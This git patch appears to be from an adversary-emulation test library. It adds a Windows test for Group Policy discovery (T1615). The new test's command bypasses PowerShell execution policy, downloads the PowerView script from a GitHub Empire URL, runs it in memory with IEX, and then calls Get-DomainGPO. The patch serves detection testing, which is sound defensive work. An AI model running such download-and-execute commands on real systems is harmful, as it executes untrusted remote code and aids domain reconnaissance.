From aa18e31b48e0ca187f6c1ef0999853c121e0808f Mon Sep 17 00:00:00 2001
From: Jesse Moore <jesse.f.moore@gmail.com>
Date: Sun, 24 Apr 2022 20:41:07 -0700
Subject: [PATCH] This is for the Challenge Bounty -Group Policy Discovery on
 Windows

---
 atomics/T1615/T1615.yaml | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/atomics/T1615/T1615.yaml b/atomics/T1615/T1615.yaml
index 05fcc255..4401124e 100644
--- a/atomics/T1615/T1615.yaml
+++ b/atomics/T1615/T1615.yaml
@@ -16,3 +16,12 @@ atomic_tests:
     elevation_required: false
     command: |
       gpresult /z
+
+- name: Get-DomainGPO to display group policy information via PowerView
+  description: Use PowerView to Get-DomainGPO This will only work on Windows 10 Enterprise and A DC Windows 2019.
+  supported_platforms:
+  - windows
+  executor:
+    command: powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO"
+    name: powershell
+    elevation_required: true
\ No newline at end of file